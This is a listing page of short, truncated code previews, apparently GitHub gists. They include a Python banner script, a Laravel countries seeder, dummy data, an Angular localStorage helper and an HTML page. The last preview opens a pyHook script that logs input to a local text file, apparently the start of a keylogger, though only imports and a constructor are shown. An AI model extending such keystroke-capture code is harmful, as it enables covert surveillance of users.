This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import os | |
import sys, traceback | |
def main(): | |
try: | |
print (''' | |
$$\ $$\ $$\ $$\ $$\ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
class CountriesTableSeeder extends Seeder { | |
public function run() | |
{ | |
Country::insert([ | |
[ | |
'long_name' => 'Afghanistan', | |
'short_name' => 'AF', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id 7 | |
title asfasdafsd | |
postalcode asdfasdf | |
stars 2 | |
object_type_id 1 | |
address asfasffd | |
undertitle asdfasdf | |
email [email protected] | |
content | |
brief_description adsasdasd |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.factory('$localstorage', ['$window', function($window) { | |
return { | |
set: function(key, value) { | |
$window.localStorage[key] = value; | |
}, | |
get: function(key, defaultValue) { | |
return $window.localStorage[key] || false; | |
}, | |
setObject: function(key, value) { | |
$window.localStorage[key] = JSON.stringify(value); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
import sys, os, re | |
import logging | |
import collections | |
is_py3k = sys.version_info[0] > 2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<!-- Aysad Kozanoglu --> | |
<html> | |
<head> | |
<title>foto cek</title> | |
<style> | |
html { | |
-webkit-user-select: none; | |
} | |
</style> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pyHook | |
import pythoncom | |
import sys | |
class dinlensek: | |
def __init__(self): | |
exitKey="4" | |
adres="C:\kayit.txt" #acılacak txt dosyasının adresi | |
self.exitKey= exitKey |
NewerOlder